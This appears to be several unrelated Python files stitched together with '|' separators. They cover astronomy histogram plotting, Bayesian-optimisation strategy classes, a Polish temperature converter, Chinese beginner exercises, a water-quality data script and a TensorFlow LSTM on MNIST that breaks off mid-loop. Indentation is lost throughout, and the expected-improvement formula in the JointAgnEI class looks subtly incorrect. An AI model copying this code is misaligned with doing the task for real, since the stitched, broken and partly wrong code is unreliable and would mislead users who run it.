plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,17)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='r',transform=ax.transAxes)
plt.xlabel(r'${\zeta_\frac{M_{rms}^3}{r}}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 14
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=29
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,18)
rangemax=7
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,18)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{zM}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 15
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=31
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,19)
rangemax=10
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,19)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{zM^2}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6, direction='up')
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 16
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
plt.legend(bbox_to_anchor=(1.5, 4), loc='center left', borderaxespad=0., fontsize=10)
#plt.subplots_adjust(top=0.6)
plt.tight_layout()
plt.savefig('%s_overdensities_%s_size%s_i%s.png' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), dpi=1000)
#plt.show()
os.system("rm fieldshistW1_50_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW2_50_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW3_50_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW4_50_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW1_75_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW2_75_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW3_75_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW4_75_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
if str(sys.argv[2]) == "samp":
print(" --- %s seconds ---" % (time.time() - start_time))
print 'Done!'
|
"""
Class of strategies that are agnostic and have a joint GP.
"""
from argparse import Namespace
import numpy as np
from scipy.stats import norm as normal_distro
from strategies.joint_opt import JointOpt
from util.misc_util import sample_grid, build_gp_posterior, ei_acq, \
expected_improvement_for_norm_diff
class JointAgnosticOpt(JointOpt):
def _child_decide_query(self, idx):
"""Given a particular gp, decide best point to query.
Args:
idx: Index of GP and domain to use.
Returns: Point on GP to query.
"""
raise NotImplementedError('To be implemented in child.')
def decide_next_query(self):
"""Make a query that decides which function and which point.
Returns: Index of functions selected and point to query.
"""
idx = np.random.randint(len(self.fcns))
build_gp_posterior(self.gps[idx])
query_pt = self._child_decide_query(idx)
return idx, query_pt
"""
IMPLEMENTATIONS
"""
class JointAgnThompson(JointAgnosticOpt):
def _child_decide_query(self, idx):
"""Given a particular gp, decide best point to query.
Args:
idx: Index of GP and domain to use.
Returns: Point on GP to query.
"""
pt_prefix = self.f_locs[idx]
rand_pts = sample_grid([pt_prefix], self.domains[idx],
self.options.max_opt_evals)
gp = self.gps[idx]
sampled = gp.draw_sample(rand_pts).ravel()
max_idx = np.argmax(sampled)
return rand_pts[max_idx, len(pt_prefix):]
@staticmethod
def get_opt_method_name():
"""Get type of agnostic method as string."""
return 'ja-thomp'
class JointAgnEI(JointAgnosticOpt):
def _child_decide_query(self, idx):
"""Given a particular gp, decide best point to query.
Args:
idx: Index of GP and domain to use.
Returns: Point on GP to query.
"""
gp = self.gps[idx]
f_idx = idx
curr_best = self.curr_best[self.f_names[f_idx]][-1][0]
ei_pts = sample_grid([self.f_locs[f_idx]], self.domains[0],
self.options.max_opt_evals)
mu, sigma = gp.eval(ei_pts, include_covar=True)
sigma = sigma.diagonal().ravel()
norm_diff = (mu - curr_best) / sigma
eis = norm_diff + normal_distro.cdf(norm_diff) \
+ normal_distro.pdf(norm_diff)
pt_idx = np.argmax(eis)
return ei_pts[pt_idx, len(self.f_locs[0]):]
@staticmethod
def get_opt_method_name():
"""Get type of agnostic method as string."""
return 'ja-ei'
ja_strats = [Namespace(name=JointAgnThompson.get_opt_method_name(),
impl=JointAgnThompson),
Namespace(name=JointAgnEI.get_opt_method_name(),
impl=JointAgnEI),
]
|
from time import sleep
def naC(temp):
return (5/9) * (temp-32)
def naF(temp):
return (9/5) * temp + 32
while(True):
opcja = input("1.Zamiana [°C] na [°F]\n2.Zamiana [°F] na [°C]\nWpisz cokolwiek innego by zakończyć program:\n")
if opcja == '1':
temp = int(input("Podaj temp w [°C]: "))
print(temp, "[°C] = ", round(naF(temp),2), "[°F]\n")
sleep(.400)
elif opcja == '2':
temp = int(input("Podaj temp w [°F]: "))
print(temp, "[°F] = ", round(naC(temp),2), "[°C]\n")
sleep(.400)
else:
print("Koniec")
break |
# 机试题
# 1.lis = [['哇',['how',{'good':['am',100,'99']},'太白金星'],'I']] (2分)
# lis = [['哇', ['how', {'good': ['am', 100, '99']}, '太白金星'], 'I']]
# o列表lis中的'am'变成大写。(1分)
# lis[0][1][1]['good'][0] = lis[0][1][1]['good'][0].upper()
# print(lis)
# o列表中的100通过数字相加在转换成字符串的方式变成'10010'。(1分)
# lis[0][1][1]['good'][1] = str(lis[0][1][1]['good'][1] + 9910)
# print(lis)
# # 2.dic = {'k1':'v1','k2':['alex','sb'],(1,2,3,):{'k3':['2',100,'wer']}} (3分)
# dic = {'k1': 'v1', 'k2': ['alex', 'sb'], (1, 2, 3,): {'k3': ['2', 100, 'wer']}}
# o将'k3'对应的值的最后面添加一个元素'23'。(1分)
# dic[(1, 2, 3,)]['k3'].append('23')
# print(dic)
# o将'k2'对应的值的第0个位置插入元素'a'。(1分)
# dic['k2'].insert(0, 'a')
# print(dic)
# o将(1,2,3,)对应的值添加一个键值对'k4','v4'。(1分)
# dic[(1, 2, 3,)].setdefault('k4', 'v4')
# print(dic)
# 3.实现一个整数加法计算器(多个数相加):(5分)
# 如:content = input("请输入内容:") 用户输入:5+9+6 +12+ 13,然后进行分割再进行计算。
# content = input('请输入内容')
# con1 = content.split('+')
# s = 0
# for i in con1:
# s += int(i)
# print(s)
# 4.请写一个电影投票程序。现在上映的电影列表如下:(10分)
lst = ['复仇者联盟4', '驯龙高手3', '金瓶梅', '老男孩', '大话西游']
# 由用户给每⼀个电影投票.最终将该⽤户投票信息公布出来。
# 要求:
# o用户可以持续投票,用户输入序号,进行投票。比如输入序号 2,给金瓶梅投票1。
# o每次投票成功,显示给哪部电影投票成功。
# o退出投票程序后,要显示最终每个电影的投票数。
# 建议最终投票的结果为这种形式:
# {'⾦瓶梅': 0, '复仇者联盟4': 0, '驯龙高手3': , '老男孩': 0,'大话西游':0}
# dic = dict.fromkeys(lst, 0)
# print(dic)
# while True:
# select1 = input('请输入你想要投票电影的序号/按q/Q退出')
# if select1.upper() == 'Q':
# break
# dic[lst[int(select1)]] += 1
# print(f'给{lst[int(select1)]}投票成功')
# print(dic)
#
# 5.有文件t1.txt里面的内容为:(10分)
# id,name,age,phone,job
# 1,alex,22,13651054608,IT 2,wusir,23,13304320533,Tearcher 3,taibai,18,1333235322,IT
# 利用文件操作,将其构造成如下数据类型。
# [{'id':'1','name':'alex','age':'22','phone':'13651054608','job':'IT'},......]
# l1 = []
# l2 = []
# l3 = []
# with open('t1', mode='r', encoding='utf-8') as f1:
# ret = f1.readlines()
# l1 = ret[0].strip().split(',')
# l2 = ret[1].strip().split(' ')
# for i in l2:
# ret1 = i.strip().split(',')
# dic1 = {l1[j]:ret1[j] for j in range(len(l1))}
# l3.append(dic1)
#
# print(l3)
# 6.按要求完成下列转化。(10分)
list3 = [
{"name": "alex", "hobby": "抽烟"},
{"name": "alex", "hobby": "喝酒"},
{"name": "alex", "hobby": "烫头"},
{"name": "alex", "hobby": "Massage"},
{"name": "wusir", "hobby": "喊麦"},
{"name": "wusir", "hobby": "街舞"},
{"name": "wusir", "hobby": "出差"},
]
list4 = [
{"name": "alex", "hobby_list": ["抽烟", "喝酒", "烫头", "Massage"]},
{"name": "wusir", "hobby_list": ["喊麦", "街舞","出差"]},
]
# 将list3 这种数据类型转化成list4类型,你写的代码必须支持可拓展.
# 比如list3 数据在加一个这样的字典{"name": "wusir", "hobby": "溜达"},
# list4 {"name": "wusir", "hobby_list": ["喊麦", "街舞", "溜达"]
# 或者list3增加一个字典{"name": "太白", "hobby": "开车"},
# list4{"name": "太白", "hobby_list": ["开车"],
# 无论按照要求加多少数据,你的代码都可以转化.如果不支持拓展,则4分,支持拓展则10分.
# lst = []
# for i in list3:
# dic = {}
# l1 = []
# dic['name'] = i['name']
# while True:
# if i['name'] == 'alex':
# l1.append(i['hobby'])
# dic['hobby_list'] = l1
# else:
# break
# lst.append(dic)
# print(lst)
l1 = []
# 1.直接构建。
for i in list3:
for j in l1:
if i['name'] == j['name']:
j['hobby_list'].append(i['hobby'])
break
else:
l1.append({'name': i['name'], 'hobby_list': [i['hobby'], ]})
print(l1)
|
import acqua.aqueduct as aq
import acqua.label as al
import acqua.labelCollection as coll
gestore = "ACAMLaSpezia"
aq.setEnv('Liguria//'+gestore)
dataReportCollectionFile = 'Metadata/DataReportCollection.csv'
geoReferencedLocationsListFile = 'Metadata/GeoReferencedLocationsList.csv'
fc = al.createJSONLabels(gestore,dataReportCollectionFile,geoReferencedLocationsListFile)
coll.display(fc)
import pandas as pd
data = pd.read_csv('Metadata/DataReportCollection.csv')
data.residuo_fisso.min(),data.residuo_fisso.max()
import matplotlib as mpl
import matplotlib.pyplot as plt
plt.plot(data.residuo_fisso) |
# /usr/bin/python
# -*- encoding:utf-8 -*-
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.contrib.rnn import BasicLSTMCell
from tensorflow.contrib.rnn import MultiRNNCell
from tensorflow.contrib.rnn import static_bidirectional_rnn
from tensorflow.contrib.layers import fully_connected
import numpy as np
mnist = input_data.read_data_sets('../../MNIST_data/', one_hot=True)
n_input = 28
n_steps = 28
n_hidden = 128
n_classes = 10
x = tf.placeholder('float', [None, n_steps*n_input])
y = tf.placeholder('float', [None, n_classes])
x1 = tf.reshape(x, [-1, 28, 28])
x1 = tf.unstack(x1, n_steps, 1)
lstm_fw_cell = BasicLSTMCell(n_hidden)
lstm_bw_cell = BasicLSTMCell(n_hidden)
outputs, _, _ = static_bidirectional_rnn(lstm_fw_cell, lstm_bw_cell, x1, dtype=tf.float32)
# output = tf.concat(outputs, 2)
pred = fully_connected(outputs[-1], n_classes, activation_fn=None)
cost = tf.reduce_mean(tf.reduce_sum(tf.square(pred - y)))
global_step = tf.Variable(0, trainable=False)
initial_learning_rate = 0.01
learning_rate = tf.train.exponential_decay(initial_learning_rate,
global_step=global_step,
decay_steps=3,
decay_rate=0.9)
add_global = global_step.assign_add(1)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
training_epochs = 1
batch_size = 100
display_step = 1
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples/batch_size)
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
